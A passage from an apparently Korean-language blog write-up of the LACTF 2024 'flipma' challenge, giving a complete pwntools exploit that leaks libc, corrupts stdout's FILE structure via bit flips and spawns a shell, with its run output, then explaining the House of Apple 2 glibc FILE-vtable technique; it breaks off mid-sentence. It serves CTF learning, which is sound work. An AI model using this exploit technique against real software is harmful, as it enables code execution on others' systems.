data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">aaw(libc_stdout, uu64(b\"  sh;\"), 0x00000000fbad3887)<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nimport warnings\nwarnings.filterwarnings('ignore')\n \n# p = process('.\/flipma', level=\"debug\")\np = process('.\/flipma')\n\ne = ELF('.\/flipma',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6',checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = 
lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\n# _IO_2_1_stdout_->flags \n#0x00000000fbad2087 \u2192 0x00000000fbad2887 \nsla(\"a: \", str(0xD21))\nsla(\"b: \", str(3))\n\n# _IO_2_1_stdout_->flags \n#0x00000000fbad2887 \u2192 0x00000000fbad3887 \nsla(\"a: \", str(0xD21))\nsla(\"b: \", str(4))\n\n# _IO_2_1_stdout_\u2192_IO_write_base\n#0x7ffff7fb2723 \u2192 0x7ffff7fb0723  \nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(5))\n\n# no change\nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(-1))\n\nleak = p.recvuntil(b\"we\")\nlibc_base = u64(leak[5:5+8]) - 0x157f10 \nbin_base = u64(leak[0x825:0x825+8]) - 0x4020\nsuccess(f\"libc_base: {hex(libc_base)}\")\nsuccess(f\"bin_base: {hex(bin_base)}\")\n\nflips = bin_base + e.symbols[\"flips\"]\nlibc_stdin = libc_base + l.symbols[\"_IO_2_1_stdin_\"]\nsuccess(f\"flips: {hex(flips)}\")\nsuccess(f\"stdin: {hex(libc_stdin)}\")\n\nsla(\"a: \", str(flips - libc_stdin))\nsla(\"b: \", str(7))\n\nlibc_stdout = libc_base + l.symbols[\"_IO_2_1_stdout_\"]\nlibc_file_jumps = libc_base + l.symbols[\"_IO_file_jumps\"]\nlibc_wfile_jumps = libc_base + l.symbols[\"_IO_wfile_jumps\"]\nsuccess(f\"libc_stdout: {hex(libc_stdout)}\")\nsuccess(f\"libc_file_jumps: {hex(libc_file_jumps)}\")\nsuccess(f\"libc_wfile_jumps: {hex(libc_wfile_jumps)}\")\n\ndef convert_old(_to, _from):\n    for i in range(255):\n        if _to == (_from ^ (1 &lt;&lt; i)):\n            return i\n        \ndef convert(_to, _from):\n    \"\"\"\n    Return the indices of the bits that must be flipped to get from _from to _to,\n    one at a time, 
in order.\n    \"\"\"\n    seq = []\n    diff = _from ^ _to\n    # loop until diff becomes 0\n    while diff:\n        # isolate the lowest set bit\n        lowest = diff &amp; -diff\n        # compute the position of that bit\n        i = lowest.bit_length() - 1\n        seq.append(i)\n        # flip that bit in _from\n        _from ^= (1 &lt;&lt; i)\n        # recompute diff for the next iteration\n        diff = _from ^ _to\n    return seq\n        \ndef aaw(addr, val, orig):\n    val_bytes = val.to_bytes(8, byteorder='little')  \n    orig_bytes = orig.to_bytes(8, byteorder='little')  \n\n    for i in range(8):\n        # print(f\"val_bytes[i]: {hex(val_bytes[i])}\")\n        # print(f\"orig_bytes[i]: {hex(orig_bytes[i])}\")\n        # print(f\"convert(val_bytes[i], orig_bytes[i]): {convert(val_bytes[i], orig_bytes[i])}\")\n        b_list = convert(val_bytes[i], orig_bytes[i])\n        for j in range(len(b_list)):\n            sla(\"a: \", str(addr+i - libc_stdin))\n            sla(\"b: \", str(b_list[j]))\n\nnew_vtable = libc_base + 0x1ED800\ninfo(f\"new_vtable: {hex(new_vtable)}\")\n# pause()\n# aaw(libc_stdout + 0xA0, 0x4142434445464748, libc_base + 0x1EC880)\n\n# def aaw(addr, new, orig):\n# (struct _IO_FILE_plus *)->_wide_data = new_vtable\naaw(libc_stdout + 0xA0, new_vtable, libc_base + 0x1EC880)\n# (struct _IO_wide_data*)->_wide_vtable = new_vtable + 0x100\naaw(new_vtable + 0xE0, new_vtable + 0x100, 0)\n# (struct _IO_jump_t *)->__doallocate = system\naaw(new_vtable + 0x168, libc_base+l.symbols[\"system\"], 0)\n# (struct _IO_FILE_plus *)->vtable = _IO_wfile_jumps\naaw(libc_stdout + 0xD8, libc_wfile_jumps, libc_file_jumps)\n\naaw(libc_stdout, uu64(b\"  sh;\"), 0x00000000fbad3887)\n\nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(-1))\n\np.interactive()<\/pre>\n\n\n\n<h3 
class=\"wp-block-heading\">Result<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@ubuntu:~\/study\/LACTF2024\/flipma$ python3 solve.py\n[+] Starting local process '.\/flipma': pid 16999\n[+] libc_base: 0x7ffff7dc5000\n[+] bin_base: 0x555555554000\n[+] flips: 0x555555558010\n[+] stdin: 0x7ffff7fb1980\n[+] libc_stdout: 0x7ffff7fb26a0\n[+] libc_file_jumps: 0x7ffff7fae4a0\n[+] libc_wfile_jumps: 0x7ffff7fadf60\n[*] new_vtable: 0x7ffff7fb2800\n[*] Switching to interactive mode\n$ id\nuid=1000(seo) gid=1000(seo) groups=1000(seo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),133(lxd),134(sambashare)\n$ whoami\nseo\n$ ls\nflipma     libc.so.6.id0  libc.so.6.id2  libc.so.6.til  solve2.py  test.py\nlibc.so.6  libc.so.6.id1  libc.so.6.nam  prob           solve.py\n$<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">About House of Apple<\/h2>\n\n\n\n<p><strong>Reference<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/chovid99.github.io\/posts\/stack-the-flags-ctf-2022\/**\">https:\/\/chovid99.github.io\/posts\/stack-the-flags-ctf-2022\/<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Gaining Remote Code Execution (RCE)<\/strong><\/h3>\n\n\n\n<p>\uc9c0\uae08\uae4c\uc9c0 \uc6b0\ub9ac\ub294 \ub2e4\uc74c\uacfc \uac19\uc740 \uc0c1\ud669\uc5d0 \ub3c4\ub2ec\ud588\uc2b5\ub2c8\ub2e4:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>libc \uc601\uc5ed\uc5d0 \ub300\ud55c OOB(Out-Of-Bounds) \uc4f0\uae30 \ucde8\uc57d\uc810\uc744 \ubcf4\uc720\ud558\uace0 \uc788\uc74c<\/li>\n\n\n\n<li>\uc815\ubcf4 \uc720\ucd9c\uc744 \ud1b5\ud574 libc\uc758 base \uc8fc\uc18c\ub97c \ud68d\ub4dd\ud568<\/li>\n<\/ul>\n\n\n\n<p>\uc774\uc81c \uc6b0\ub9ac\ub294 \uc774 OOB \ubc84\uadf8\uc640 \uc720\ucd9c\ub41c libc base \uc8fc\uc18c \uc815\ubcf4\ub97c \ud65c\uc6a9\ud574\uc11c RCE(Remote Code 
Execution)\ub97c \ub2ec\uc131\ud574\uc57c \ud569\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ucd5c\uadfc\uc5d0 \ub17c\uc758\ud588\ub358 glibc 2.35\uc5d0\uc11c FILE \uad6c\uc870\uccb4 \uacf5\uaca9\uc744 \ud1b5\ud574 RIP \uc81c\uc5b4\ub97c \uc5bb\ub294 \ubc29\ubc95\uc5d0 \ub300\ud55c \uc9c0\uc2dd\uc744 \uc801\uc6a9\ud574\ubcfc \uc218 \uc788\uaca0\ub2e4\ub294 \uc0dd\uac01\uc774 \ub4ed\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ubc30\uacbd \uc124\uba85\uc744 \uc704\ud574, glibc\uc758 \uad6c\ubc84\uc804\uc5d0\uc11c\ub294 <code>file-&gt;vtable<\/code> \uc8fc\uc18c\ub97c \uc6b0\ub9ac\uac00 \ub9cc\ub4e0 \uac00\uc9dc vtable\ub85c \ub36e\uc5b4\uc4f8 \uc218 \uc788\uc5c8\uace0,<\/p>\n\n\n\n<p>\uc774\ub807\uac8c \ub418\uba74 \uc608\ub97c \ub4e4\uc5b4 <code>_IO_OVERFLOW<\/code> \uba54\uc11c\ub4dc\uac00 \ud638\ucd9c\ub420 \ub54c, \uc2e4\uc81c \ud568\uc218 \uc8fc\uc18c\uac00 \uc544\ub2cc \uc6b0\ub9ac\uac00 \uc124\uc815\ud55c \uc8fc\uc18c\ub85c \uc810\ud504\ud558\uac8c \ub9cc\ub4e4 \uc218 \uc788\uc5c8\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ud558\uc9c0\ub9cc, \uc774\ub294 glibc \uce21\uc5d0\uc11c \ubc29\uc5b4\uac00 \ucd94\uac00\ub418\uc5b4 \ub354 \uc774\uc0c1 \uc27d\uac8c \uc0ac\uc6a9\ud560 \uc218 \uc5c6\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>glibc\ub294 FILE \uad6c\uc870\uccb4\uc5d0 \uc800\uc7a5\ub41c vtable\uc774 \uc62c\ubc14\ub978 \uc601\uc5ed\uc5d0 \uc874\uc7ac\ud558\ub294\uc9c0 \uc5ec\ubd80\ub97c \uac80\uc0ac\ud558\uae30 \ub54c\ubb38\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc544\ub798 LOC(\ucf54\ub4dc \ub77c\uc778)\ub97c \ucc38\uace0\ud558\uc2ed\uc2dc\uc624:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">static inline const struct _IO_jump_t *\nIO_validate_vtable (const struct _IO_jump_t *vtable)\n{\n  \/* Fast path: The vtable pointer is within the __libc_IO_vtables\n     section.  
*\/\n  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;\n  uintptr_t ptr = (uintptr_t) vtable;\n  uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;\n  if (__glibc_unlikely (offset >= section_length))\n    \/* The vtable pointer is not in the expected section.  Use the\n       slow path, which will terminate the process if necessary.  *\/\n    _IO_vtable_check ();\n  return vtable;\n}\n\n#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)\n\n#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)\n\n# define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))\n\n#define _IO_JUMPS_FILE_plus(THIS) \\\n  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE_plus, vtable)\n<\/pre>\n\n\n\n<p>\uc608\ub97c \ub4e4\uc5b4 \uc5b4\ub5a4 \uba54\uc11c\ub4dc\uac00 <code>_IO_OVERFLOW<\/code>\ub97c \ud638\ucd9c\ud558\ub824\uace0 \ud560 \ub54c, \ud574\ub2f9 \uba54\uc11c\ub4dc\ub294 <code>vtable<\/code> \ub0b4\uc5d0\uc11c <code>__overflow<\/code> \ud0a4\uc5d0 \ub9e4\ud551\ub41c \ud3ec\uc778\ud130\ub85c \uc810\ud504\ub97c \uc2dc\ub3c4\ud558\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uadf8\ub7ec\ub098 \uc810\ud504\ub97c \uc218\ud589\ud558\uae30 \uc804\uc5d0 <code>IO_validate_vtable<\/code>\uc744 \ud638\ucd9c\ud558\uc5ec \ud574\ub2f9 \ud3ec\uc778\ud130\uac00 \uc720\ud6a8\ud55c \uc601\uc5ed\uc5d0 \uc704\uce58\ud574 \uc788\ub294\uc9c0 \uba3c\uc800 \uac80\uc99d\ud569\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc774\ub85c \uc778\ud574, \uacfc\uac70\ucc98\ub7fc \uc6b0\ub9ac\uac00 \uac00\uc9dc vtable\uc744 \uc124\uc815\ud574 \uc784\uc758\uc758 \uba54\uc11c\ub4dc\ub85c \uc810\ud504\ud558\uac8c \ub9cc\ub4dc\ub294 \ud2b8\ub9ad\uc740 \ub354 \uc774\uc0c1 \uc791\ub3d9\ud558\uc9c0 \uc54a\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc65c\ub0d0\ud558\uba74 glibc\ub294 \uc774\uc81c vtable\uc774 \uc62c\ubc14\ub978 \uba54\ubaa8\ub9ac \uc601\uc5ed\uc5d0 \uc788\ub294\uc9c0\ub97c \uac80\uc0ac\ud558\uae30 
\ub54c\ubb38\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ud558\uc9c0\ub9cc \uc774 \uac80\uc0ac\ub294 \uc624\uc9c1 &#8220;\uc800\uc7a5\ub41c \ud3ec\uc778\ud130\uac00 vtable \uc601\uc5ed\uc5d0 \uc874\uc7ac\ud558\ub294\uac00?&#8221;\ub9cc \uac80\uc99d\ud560 \ubfd0\uc774\uae30 \ub54c\ubb38\uc5d0, \uc6b0\ub9ac\ub294 \uc5ec\uc804\ud788 vtable\uc744 &#8220;\ubbf8\uc2a4\uc5bc\ub77c\uc778(misalignment)&#8221; \uc2dc\ud0a4\ub294 \ubc29\uc2dd\uc73c\ub85c \uc6b0\ud68c\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc608\ub97c \ub4e4\uc5b4 vtable\uc744 \ud55c \uc5d4\ud2b8\ub9ac\ub9cc\ud07c \ubc00\uc5b4\ubc84\ub9ac\uba74, <code>_IO_OVERFLOW<\/code>\ub97c \ud638\ucd9c\ud560 \ub54c \uc6d0\ub798\uc758 \uc704\uce58\uac00 \uc544\ub2cc <code>_IO_UNDERFLOW<\/code> \ub4f1 \ub2e4\ub978 \ud568\uc218\ub85c \uc798\ubabb \uc810\ud504\ud558\uac8c \ub9cc\ub4e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc774\ub7ec\ud55c \uc6b0\ud68c \ubc29\ubc95\uc744 \uc545\uc6a9\ud558\ub824\ub294 \uc2dc\ub3c4\ub4e4\uc774 \uc788\uc5c8\uace0, \ucd5c\uadfc\uc5d0\ub294 <strong>kylebot<\/strong>\uc774\ub77c\ub294 \uc0ac\ub78c\uc774 \uc791\uc131\ud55c \uae00\uc5d0\uc11c \ub2e4\uc74c\uacfc \uac19\uc740 \uc0ac\uc2e4\uc774 \ubc1c\uacac\ub418\uc5c8\uc2b5\ub2c8\ub2e4:<\/p>\n\n\n\n<p>glibc\ub294 <code>_IO_JUMPS_FUNC<\/code> \ub9e4\ud06c\ub85c\ub97c \ud1b5\ud574 \uc810\ud504\ud560 \ub54c\ub9cc vtable\uc5d0 \ub300\ud55c \uc720\ud6a8\uc131 \uac80\uc0ac\ub97c \uc218\ud589\ud558\uace0, wide vtable\uc5d0 \ub300\ud574 \uc810\ud504\ud560 \ub54c \uc0ac\uc6a9\ud558\ub294 <code>_IO_WIDE_JUMPS_FUNC<\/code> \ub9e4\ud06c\ub85c\uc5d0\uc11c\ub294 \uac80\uc0ac\ub97c \uc218\ud589\ud558\uc9c0 \uc54a\ub294\ub2e4\ub294 \uac83\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uadf8\ub9ac\uace0 \uba87 \ub2ec \uc804, \uc774\uc640 \ub3d9\uc77c\ud55c \ucde8\uc57d\uc810\uc744 \uc545\uc6a9\ud558\ub824 \ud55c \ub610 \ub2e4\ub978 \uae30\uc0ac\uac00 \ubc1c\ud45c\ub418\uc5c8\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ubc14\ub85c <strong>House of Apple 
2<\/strong>\ub77c\ub294 \uacf5\uaca9 \uae30\ubc95\uc73c\ub85c, \uc774\ub294 <strong>roderick01<\/strong>\uc774\ub77c\ub294 \uc791\uc131\uc790\uac00 \ud574\ub2f9 \uae00\uc5d0\uc11c \uc18c\uac1c\ud55c \ubc29\uc2dd\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc9c0\uae08\ubd80\ud130\ub294 \uc774 \ub450 \ube14\ub85c\uadf8\ub97c \uc77d\uc73c\uba70 \uc774\ud574\ud55c \ubc14\ub97c \ubc14\ud0d5\uc73c\ub85c \uc880 \ub354 \uc790\uc138\ud788 \uc124\uba85\ud574\ubcf4\uaca0\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uba3c\uc800 \uae30\uc5b5\ud574\uc57c \ud560 \uc810\uc740, \ucd5c\uc2e0 glibc\uc5d0 \ub3c4\uc785\ub41c \ud574\ub2f9 \ubcf4\uc548 \uae30\ubc95\uc740 <strong>FILE \uad6c\uc870\uccb4\uc5d0 \uc800\uc7a5\ub41c vtable\uc774 \uc62c\ubc14\ub978 \uc601\uc5ed\uc5d0 \uc874\uc7ac\ud558\ub294\uc9c0 \uc5ec\ubd80<\/strong>\ub9cc \ud655\uc778\ud55c\ub2e4\ub294 \uac83\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ud45c\uc900 \ud30c\uc77c \uac1d\uccb4\uac00 \uc0ac\uc6a9\ud558\ub294 \uae30\ubcf8 vtable\uc740 <code>_IO_file_jumps<\/code>\uc785\ub2c8\ub2e4. 
\ud558\uc9c0\ub9cc \uc2e4\uc81c\ub85c\ub294 \uc774 \uc601\uc5ed\uc5d0 \ub2e4\ub978 vtable\ub3c4 \ub2e4\uc218 \uc874\uc7ac\ud558\uace0,<\/p>\n\n\n\n<p>\uadf8\uc911 \ud558\ub098\uac00 \ubc14\ub85c <code>_IO_wfile_jumps<\/code>\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc544\ub798\ub294 GDB\ub97c \ud1b5\ud574 \ucd9c\ub825\ud55c <code>_IO_wfile_jumps<\/code>\uc758 \uae30\ubcf8 \uc5d4\ud2b8\ub9ac \ub0b4\uc6a9\uc785\ub2c8\ub2e4:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  print __GI__IO_wfile_jumps\n$11 = {\n  __dummy = 0x0,\n  __dummy2 = 0x0,\n  __finish = 0x7ffff7e20070 &lt;_IO_new_file_finish>,\n  __overflow = 0x7ffff7e1a410 &lt;__GI__IO_wfile_overflow>,\n  __underflow = 0x7ffff7e19050 &lt;__GI__IO_wfile_underflow>,\n  __uflow = 0x7ffff7e178c0 &lt;__GI__IO_wdefault_uflow>,\n  __pbackfail = 0x7ffff7e17680 &lt;__GI__IO_wdefault_pbackfail>,\n  __xsputn = 0x7ffff7e1a8c0 &lt;__GI__IO_wfile_xsputn>,\n  __xsgetn = 0x7ffff7e1f330 &lt;__GI__IO_file_xsgetn>,\n  __seekoff = 0x7ffff7e197d0 &lt;__GI__IO_wfile_seekoff>,\n  __seekpos = 0x7ffff7e22530 &lt;_IO_default_seekpos>,\n  __setbuf = 0x7ffff7e1e620 &lt;_IO_new_file_setbuf>,\n  __sync = 0x7ffff7e1a720 &lt;__GI__IO_wfile_sync>,\n  __doallocate = 0x7ffff7e13f10 &lt;_IO_wfile_doallocate>,\n  __read = 0x7ffff7e1f9b0 &lt;__GI__IO_file_read>,\n  __write = 0x7ffff7e1ef40 &lt;_IO_new_file_write>,\n  __seek = 0x7ffff7e1e6f0 &lt;__GI__IO_file_seek>,\n  __close = 0x7ffff7e1e610 &lt;__GI__IO_file_close>,\n  __stat = 0x7ffff7e1ef30 &lt;__GI__IO_file_stat>,\n  __showmanyc = 0x7ffff7e234a0 &lt;_IO_default_showmanyc>,\n  __imbue = 0x7ffff7e234b0 &lt;_IO_default_imbue>\n}<\/pre>\n\n\n\n<p>\uc774\uc81c <code>_IO_wfile_overflow<\/code> \ud568\uc218\uc758 \uad6c\ud604\uc744 \ud55c\ubc88 
\uc0b4\ud3b4\ubcf4\uaca0\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc774 \ud568\uc218\ub294 <strong>kylebot<\/strong>\uacfc <strong>roderick01<\/strong> \ub450 \uc0ac\ub78c\uc774 \ubaa8\ub450 \ubc1c\uacac\ud55c \ucde8\uc57d \uacbd\ub85c \uc911 \ud558\ub098\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">wint_t\n_IO_wfile_overflow (FILE *f, wint_t wch)\n{\n  if (f->_flags &amp; _IO_NO_WRITES) \/* SET ERROR *\/\n    {\n      f->_flags |= _IO_ERR_SEEN;\n      __set_errno (EBADF);\n      return WEOF;\n    }\n  \/* If currently reading or no buffer allocated. *\/\n  if ((f->_flags &amp; _IO_CURRENTLY_PUTTING) == 0)\n    {\n      \/* Allocate a buffer if needed. *\/\n      if (f->_wide_data->_IO_write_base == 0)\n\t{\n\t  _IO_wdoallocbuf (f);\n\t  ...\n\t}\n      ...\n}\n\nvoid\n_IO_wdoallocbuf (FILE *fp)\n{\n  if (fp->_wide_data->_IO_buf_base)\n    return;\n  if (!(fp->_flags &amp; _IO_UNBUFFERED))\n    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)\n      ...\n}\n\n#define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP)\n\n#define WJUMP0(FUNC, THIS) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS)\n\n#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)\n\n#define _IO_WIDE_JUMPS(THIS) \\\n  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable\n<\/pre>\n\n\n\n<p>\uc704\uc5d0\uc11c \ubcfc \uc218 \uc788\ub4ef\uc774, \uc6b0\ub9ac\uac00 <code>WJUMP0<\/code>\ub97c \ud2b8\ub9ac\uac70\ud560 \uc218 \uc788\ub2e4\uba74 <code>wide_vtable<\/code>\uc5d0 \uc800\uc7a5\ub41c \ud3ec\uc778\ud130\uac00 \uc62c\ubc14\ub978 \uc601\uc5ed\uc5d0 \uc788\ub294\uc9c0\uc5d0 \ub300\ud55c <strong>\uac80\uc99d\uc774 \uc804\ud600 \uc774\ub8e8\uc5b4\uc9c0\uc9c0 \uc54a\uc2b5\ub2c8\ub2e4<\/strong>.<\/p>\n\n\n\n<p>\uc989, \uc6b0\ub9ac\uac00 \uac00\uc9dc <code>wide_vtable<\/code>\uc744 
\uc870\uc791\ud558\uace0 \ub9e4\ud06c\ub85c \ud638\ucd9c(<code>WJUMP0<\/code>)\uc744 \uc720\ub3c4\ud560 \uc218 \uc788\ub2e4\uba74, <strong>\uacfc\uac70 glibc\ucc98\ub7fc \uc6b0\ub9ac\uac00 \uc6d0\ud558\ub294 \uc784\uc758\uc758 \uc8fc\uc18c\ub85c \uc810\ud504<\/strong>\ud560 \uc218 \uc788\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ub610\ud55c \uc8fc\ubaa9\ud560 \uc810\uc740, <code>_IO_WIDE_JUMPS<\/code> \ud638\ucd9c \uc2dc \uc0ac\uc6a9\ub418\ub294 vtable\uc740 <code>fp-&gt;_wide_data-&gt;_wide_vtable<\/code>\uc5d0\uc11c \uac00\uc838\uc628\ub2e4\ub294 \uac83\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>gdb\uc5d0\uc11c <code>stdfile<\/code> \uad6c\uc870\uccb4\ub97c \ud655\uc778\ud574\ubcf4\uba74, \uadf8 \uc548\uc5d0 <code>_wide_data<\/code>\ub77c\ub294 \ud544\ub4dc\uac00 \uc788\uace0, \uc774\ub294 <code>_IO_wide_data_1<\/code>\uc774\ub77c\ub294 \ub610 \ub2e4\ub978 \uad6c\uc870\uccb4\ub97c \uac00\ub9ac\ud0b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc544\ub798\ub294 gdb\ub97c \ud1b5\ud574 \ucd9c\ub825\ud55c <code>_IO_wide_data_1<\/code> \uad6c\uc870\uccb4 \ub0b4 \ud544\ub4dc\uc785\ub2c8\ub2e4:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  print _IO_wide_data_1\n$10 = {\n  _IO_read_ptr = 0x0,\n  _IO_read_end = 0x0,\n  _IO_read_base = 0x0,\n  _IO_write_base = 0x0,\n  _IO_write_ptr = 0x0,\n  _IO_write_end = 0x0,\n\n...\n\n  _shortbuf = L\"\",\n  _wide_vtable = 0x7ffff7faa0c0 &lt;__GI__IO_wfile_jumps> &lt;- This is the one that we can overwrite with our fake vtable\n}<\/pre>\n\n\n\n<p>\uc774 \uc815\ubcf4\ub97c \ubc14\ud0d5\uc73c\ub85c \ubcf4\uba74, \ub9cc\uc57d \uc6b0\ub9ac\uac00 <code>FILE<\/code> \uad6c\uc870\uccb4\uc758 vtable\uc744 <code>_IO_file_jumps<\/code>\uc5d0\uc11c <code>_IO_wfile_jumps<\/code>\ub85c <strong>\ubbf8\uc2a4\uc5bc\ub77c\uc778<\/strong>\uc2dc\ud0a4\uace0, 
<code>__overflow<\/code> \ud638\ucd9c\uc744 \ud2b8\ub9ac\uac70\ud560 \uc218 \uc788\ub2e4\uba74, \ub2e4\uc74c\uacfc \uac19\uc740 \ud638\ucd9c \uccb4\uc778\uc774 \ubc1c\uc0dd\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc544\ub798\ub294 \uadf8 \ud638\ucd9c \uccb4\uc778\uc785\ub2c8\ub2e4:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Assuming that we overwrite the FILE->vtable from _IO_file_jumps to _IO_wfile_jumps. When the binary try to call\n_IO_OVERFLOW (fp, EOF), the chain would be:\n\n_IO_OVERFLOW (fp, EOF)\n|_ JUMP1 (__overflow, fp, EOF)\n   |_ (_IO_JUMPS_FUNC(fp)->__overflow) (fp, EOF)\n      |_ ((IO_validate_vtable (_IO_JUMPS_FILE_plus (fp)))->__overflow) (fp, EOF) &lt;- Because we overwrite it to point to _IO_wfile_jumps, it will call _IO_wfile_overflow instead of _IO_new_file_overflow. 
This is still valid because its location is still in the correct region\n         |_ _IO_wfile_overflow(fp, EOF)\n            |_ _IO_wdoallocbuf(fp)\n               |_ _IO_WDOALLOCATE(fp)\n                  |_ WJUMP0 (__doallocate, fp)\n                     |_ (_IO_WIDE_JUMPS_FUNC(fp)->__doallocate) (fp)\n                         |_ (_IO_WIDE_JUMPS(fp)->__doallocate) (fp) &lt;- No Validation #profit :D\n<\/pre>\n\n\n\n<p>To reach this call, the following <strong>constraints must be satisfied<\/strong>:<\/p>\n\n\n\n<p>\ud83d\udd39 <strong>For <code>_IO_wfile_overflow<\/code> to call <code>_IO_wdoallocbuf<\/code>, the following checks must pass:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>if (f-&gt;_flags &amp; _IO_NO_WRITES)<\/code> \u2192 must evaluate to <strong><code>False<\/code><\/strong><\/li>\n\n\n\n<li><code>if ((f-&gt;_flags &amp; _IO_CURRENTLY_PUTTING) == 0)<\/code> \u2192 must evaluate to <strong><code>True<\/code><\/strong><\/li>\n\n\n\n<li><code>if (f-&gt;_wide_data-&gt;_IO_write_base == 0)<\/code> \u2192 must evaluate to <strong><code>True<\/code><\/strong><\/li>\n<\/ul>\n\n\n\n<p>\ud83d\udd39 <strong>To reach the <code>_IO_WDOALLOCATE<\/code> call inside <code>_IO_wdoallocbuf<\/code>, the following conditions must hold:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>if (fp-&gt;_wide_data-&gt;_IO_buf_base)<\/code> \u2192 must evaluate to <strong><code>False<\/code><\/strong><\/li>\n\n\n\n<li><code>if (!(fp-&gt;_flags &amp; _IO_UNBUFFERED))<\/code> \u2192 must evaluate to <strong><code>True<\/code><\/strong><\/li>\n<\/ul>\n\n\n\n<p>\u203b Since <code>_IO_UNBUFFERED<\/code> is <code>0x0002<\/code>, this ultimately requires <code>fp-&gt;_flags &amp; _IO_UNBUFFERED == 0<\/code>.<\/p>\n\n\n\n<p>Once all of these conditions are met,<\/p>\n\n\n\n<p>execution jumps to the pointer stored in 